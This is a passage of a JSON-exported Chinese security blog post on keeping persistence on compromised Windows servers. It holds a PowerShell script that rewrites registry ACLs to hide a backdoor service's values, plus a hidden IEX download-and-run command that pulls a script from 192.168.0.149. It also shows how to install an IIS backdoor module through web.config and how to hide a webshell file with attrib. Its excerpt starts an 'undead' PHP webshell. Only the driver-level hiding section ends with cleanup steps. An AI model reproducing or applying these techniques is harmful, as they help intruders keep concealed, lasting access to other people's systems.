\/><\/p>\n<p>\u5728\u77e5\u9053\u670d\u52a1\u540d\u7684\u524d\u63d0\u4e0b\u67e5\u8be2\u4f1a\u663e\u793a\u62d2\u7edd\u8bbf\u95ee\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc query \".NET CLR Networking 3.5.0.0\"<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae483c87e7.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609618977-a69fd8c8-0dc8-4e17-bc15-56ce2d955222.png\" \/><\/p>\n<p>\u4f46\u8fd9\u6837\u505a\u6709\u4e00\u4e2a\u95ee\u9898\uff1a\u5728\u6ce8\u518c\u8868\u4e2d\u5f88\u5bb9\u6613\u770b\u5230\u5f02\u5e38value<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking 3.5.0.0<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae486a5761.png\" class=\"lazy\"
loading=\"lazy\" alt=\"1746609630974-4d958eed-aba3-4996-9f2d-5eaff25293dc.png\" \/><\/p>\n<p>\u4fee\u6539\u6ce8\u518c\u8868ACL<\/p>\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u6ce8\u518c\u8868\u7684DACL\u6765\u62d2\u7edd\u5bf9\u503c\u7684\u67e5\u8be2\uff0c\u8fbe\u5230\u9690\u85cf\u5f02\u5e38\u503c\u7684\u6548\u679c<\/p>\n<p>\u8fd9\u91cc\u7ed9\u51fa\u4e00\u4e2a\u901a\u8fc7powershell\u4fee\u6539\u6ce8\u518c\u8868\u9879\u7684\u8bbf\u95ee\u6743\u9650\u7684\u7b80\u5355\u811a\u672c<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">function Server-Sddl-Change{\n[CmdletBinding()]\nparam\n(\n[parameter(Mandatory=$false)][String]$Name\n)\n$ROOT = \"HKLM:SYSTEMCurrentControlSetServices\"\n$S = $ROOT+$NAME\n$acl = Get-Acl $S\n$acl.SetAccessRuleProtection($true, $false)\n$person = [System.Security.Principal.NTAccount]\"Everyone\"\n$access = [System.Security.AccessControl.RegistryRights]\"QueryValues\"\n$inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\n$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\n$type = [System.Security.AccessControl.AccessControlType]\"Deny\"\n$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\n$person,$access,$inheritance,$propagation,$type)\n$acl.AddAccessRule($rule)\n$person = [System.Security.Principal.NTAccount]\"Everyone\"\n$access =\n[System.Security.AccessControl.RegistryRights]\"SetValue,CreateSubKey,EnumerateSu\nbKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang\nePermissions,TakeOwnership\"\n$inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\n$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\n$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\n$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\n$person,$access,$inheritance,$propagation,$type)\n$acl.AddAccessRule($rule)\nSet-Acl $S 
$acl\n}<\/code><\/pre>\n<p>\u8fdc\u7a0b\u52a0\u8f7dpowershell\u811a\u672c<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">powershell.exe -exec bypass -nop -w hidden -c \"IEX((new-object\nnet.webclient).downloadstring('http:\/\/192.168.0.149\/1.ps1'));Server-Sddl-Change -\nName '.NET CLR Networking 3.5.0.0'\"<\/code><\/pre>\n<p>.NET CLR Networking 3.5.0.0 \u6539\u6210\u4f60\u7684\u670d\u52a1\u540d<\/p>\n<p>\u4ece\u4e0b\u56fe\u53ef\u89c1\u5df2\u5c06\u503c\u4ece\u8be5\u670d\u52a1\u9879\u4e2d\u9690\u85cf<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae48e9d19c.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609671096-747a7864-dff6-442f-bb37-46df7dd536c4.png\" \/><\/p>\n<p>\u91cd\u542f\u8ba1\u7b97\u673a \u83b7\u53d6\u540e\u95e8<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4917ad50.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609686423-6aba7f5a-fb2d-4e7b-b782-a4f4b87b1343.png\" \/><\/p>\n<h1>iis\u540e\u95e8<\/h1>\n<p>web\u670d\u52a1\u5668\u4e0a\u4e00\u822c\u90fd \u652f\u6301net \u6240\u4ee5\u53ef\u4ee5\u8003\u8651\u5229\u7528net iis\u505a\u4e00\u4e2a\u540e\u95e8<\/p>\n<p>\u9879\u76ee\u5730\u5740 <a href=\"https:\/\/github.com\/WBGlIl\/IIS_backdoor\">https:\/\/github.com\/WBGlIl\/IIS_backdoor<\/a><\/p>\n<p>\u5728\u7f51\u7ad9\u76ee\u5f55\u4e0b\u65b0\u5efa\u4e00\u4e2abin\u6587\u4ef6\u5939 \u8fd9\u4e2a\u6587\u4ef6\u5939 \u5b58\u653edll\u96c6 \u628aIIS_backdoor_dll.dll\u5b58\u653e\u5728\u8fd9\u91cc\u9762<\/p>\n<p>\u65b0\u5efa web.config \u6216\u8005\u5728\u539f\u6709\u7684\u6587\u4ef6\u4e0a\u6dfb\u52a0 \u5185\u5bb9<\/p>\n<pre class=\"prettyprint linenums\" ><code 
class=\"language-basic\">&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;configuration&gt;\n&lt;system.webServer&gt;\n&lt;modules&gt;\n&lt;add name=\"IIS_backdoor\" type=\"IIS_backdoor_dll.IISModule\" \/&gt;\n&lt;\/modules&gt;\n&lt;\/system.webServer&gt;\n&lt;\/configuration&gt;<\/code><\/pre>\n<p>\u6253\u5f00 IIS_backdoor_shell \u628a\u7f51\u5740\u586b\u5199\u8fdb\u53bb\u5373\u53ef<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae49485c8a.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609726724-8f4752b3-8b35-4c4b-883d-0d26b1147908.png\" \/><\/p>\n<h1>window \u9690\u85cf\u6280\u672f<\/h1>\n<p>\u4f7f\u7528Attrib +s +a +h +r\u547d\u4ee4\u5c31\u662f\u628a\u539f\u672c\u7684\u6587\u4ef6\u5939\u589e\u52a0\u4e86\u7cfb\u7edf\u6587\u4ef6\u5c5e\u6027\u3001\u5b58\u6863\u6587\u4ef6\u5c5e\u6027\u3001\u53ea\u8bfb\u6587\u4ef6\u5c5e\u6027\u548c\u9690\u85cf\u6587\u4ef6\u5c5e\u6027<\/p>\n<p>\u8fd9\u6837\u5c31\u505a\u5230\u4e86\u771f\u6b63\u7684\u9690\u85cf\uff0c\u4e0d\u7ba1\u4f60\u662f\u5426\u663e\u793a\u9690\u85cf\u6587\u4ef6\uff0c\u6b64\u6587\u4ef6\u5939\u90fd\u770b\u4e0d\u89c1<\/p>\n<p>Attrib +s +a +h +r 1.php<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4982b171.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609750109-08337c09-90cf-480b-8d82-91ecd9bcda04.png\" \/><\/p>\n<p>\u8fd9\u6837\u7b97\u662f\u9690\u85cf \u5176\u5b9e\u8fd8\u6709\u67e5\u770b\u65b9\u6cd5<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae49b85940.png\" 
class=\"lazy\" loading=\"lazy\" alt=\"1746609760420-4cad4529-045b-40d6-8876-1841f219f40b.png\" \/><\/p>\n<h1>\u9a71\u52a8\u7ea7\u6587\u4ef6\u9690\u85cf<\/h1>\n<p>\u9a71\u52a8\u9690\u85cf\u6700\u5178\u578b\u7684\u73b0\u8c61\u5c31\u662f\u7cfb\u7edf\u76d8\u4e2d\u5b58\u5728\u4ee5\u4e0b\u6587\u4ef6\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">c:\\WINDOWS\\xlkfs.dat\nc:\\WINDOWS\\xlkfs.dll\nc:\\WINDOWS\\xlkfs.ini\nc:\\WINDOWS\\system32\\drivers\\xlkfs.sys<\/code><\/pre>\n<p>\u9a71\u52a8\u9690\u85cf\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u4e00\u4e9b\u8f6f\u4ef6\u6765\u5b9e\u73b0\uff0c\u8f6f\u4ef6\u540d\u5b57\u53eb\uff1aEasy File Locker \u4e0b\u8f7d\u94fe\u63a5\uff1a <a href=\"http:\/\/www.xoslab.com\/efl.html\">http:\/\/www.xoslab.com\/efl.html<\/a><\/p>\n<p>\u4e00\u822c\u505a\u9ed1\u94fe\u7684\u5c0f\u670b\u53cb\u90fd\u4f1a\u8fd9\u6837\u8bbe\u7f6e\uff1a\u53ea\u52fe\u9009\u53ef\u8bfb\uff0c\u5176\u4ed6\u7684\u4e00\u5f8b\u62d2\u7edd\u2026\u2026\u90a3\u4e48\uff0c\u4f1a\u6709\u8fd9\u6837\u7684\u6548\u679c\uff0c\u8be5\u6587\u4ef6\u4e0d\u4f1a\u663e\u793a\uff0c\u4e0d\u80fd\u901a\u8fc7\u5217\u76ee\u5f55\u5217\u51fa\u6765\uff0c\u4e5f\u4e0d\u80fd\u5220\u9664\uff0c\u9664\u975e\u4f60\u77e5\u9053\u5b8c\u6574\u8def\u5f84\uff0c\u4f60\u624d\u53ef\u4ee5\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<\/p>\n<p>\u5e76\u4e14\u8be5\u8f6f\u4ef6\u8fd8\u53ef\u4ee5\u8bbe\u7f6e\u5bc6\u7801\uff0c\u542f\u52a8\u3001\u4fee\u6539\u8bbe\u7f6e\u3001\u5378\u8f7d\u53ca\u91cd\u590d\u5b89\u88c5\u7684\u65f6\u5019\u90fd\u9700\u8981\u5bc6\u7801\uff0c\u66f4\u86cb\u75bc\u7684\u662f\uff0c\u4e3b\u754c\u9762\u3001\u5378\u8f7d\u7a0b\u5e8f\u7b49\u90fd\u53ef\u4ee5\u5220\u9664\uff0c\u53ea\u7559\u4e0b\u6838\u5fc3\u7684\u9a71\u52a8\u6587\u4ef6\u5c31\u884c\u4e86\u3002\u5982\u4f55\u6e05\u9664\uff1f<\/p>\n<p>1\u3001\u67e5\u8be2\u670d\u52a1\u72b6\u6001\uff1a sc qc xlkfs<\/p>\n<p>2\u3001\u505c\u6b62\u670d\u52a1\uff1a net stop xlkfs
\u670d\u52a1\u505c\u6b62\u4ee5\u540e\uff0c\u7ecf\u9a71\u52a8\u7ea7\u9690\u85cf\u7684\u6587\u4ef6\u5373\u53ef\u663e\u73b0<\/p>\n<p>3\u3001\u5220\u9664\u670d\u52a1\uff1a sc delete xlkfs<\/p>\n<p>4\u3001\u5220\u9664\u7cfb\u7edf\u76ee\u5f55\u4e0b\u9762\u7684\u6587\u4ef6\uff0c\u91cd\u542f\u7cfb\u7edf\uff0c\u786e\u8ba4\u670d\u52a1\u5df2\u7ecf\u88ab\u6e05\u7406\u4e86\u3002<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae49e633af.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609814656-c4e273b9-f2c2-4b60-b4bb-fc3ace4b9590.png\" \/><\/p>\n<blockquote>\n<p>\u66f4\u65b0: 2025-05-07 17:24:36<br \/>\n\u539f\u6587: <a href=\"https:\/\/www.yuque.com\/yuhui.net\/network\/modnzu7gppc1bxe9\">https:\/\/www.yuque.com\/yuhui.net\/network\/modnzu7gppc1bxe9<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>Windows\u6743\u9650\u7ef4\u6301 php \u4e0d\u6b7b\u9a6c\u6743\u9650\u7ef4\u6301 &lt;?php ignore_user_abort(); \/\/\u5173\u6389\u6d4f\u89c8\u5668\uff0cPHP\u811a\u672c\u4e5f\u53ef\u4ee5\u7ee7\u7eed\u6267\u884c. 
set_time_limit(0);\/\/\u901a\u8fc7set_time_limit(0)\u53ef\u4ee5\u8ba9\u7a0b\u5e8f\u65e0\u9650\u5236\u7684\u6267\u884c\u4e0b\u53bb $interval = 5; \/\/ \u6bcf\u9694*\u79d2\u8fd0\u884c do { $filename = &#8216;test.php&#8217;; if(file_exists($f [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[123,119,2],"tags":[12,17,22,43],"class_list":["post-792","post","type-post","status-publish","format-standard","hentry","category-tiquan","category-shentouceshijichu-network_sec","category-network_sec","tag-12","tag-github","tag-windows","tag-43"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=792"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/792\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}